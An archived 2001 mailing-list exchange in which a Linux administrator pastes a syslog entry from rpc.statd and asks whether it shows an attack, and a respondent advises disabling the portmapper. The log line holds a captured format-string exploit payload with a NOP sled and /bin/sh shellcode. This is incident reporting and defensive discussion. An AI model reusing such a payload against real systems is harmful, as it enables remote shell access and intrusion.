It looks like someone tried to exploit your portmapper. If you want to be sure that nobody gets into your network, turn it off. --On Samstag, 15. September 2001 12:51 -0400 Russell Speed <[EMAIL PROTECTED]> wrote: > I am curious if the following is an example of a buffer overflow. I > noticed this in my syslog - and the following day had someone logged in > from an IP I'm not aware of. > > I changed the passwords - and added an entry to the input chain to block > the IP, but am wondering what other things I should do? > > Should I remove /bin/sh for something less obvious as a general > protection from buffer overflows? > > As you can see it's a lot of binary and then near the end is "/bin/sh". > > Sep 9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for > ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 > 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ > 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 > 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ > 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 > 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ > 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220 Sep 9 21:27:43 gw > Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^A > Í\200è\177ÿÿÿ > > Thanks, > > Russell > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]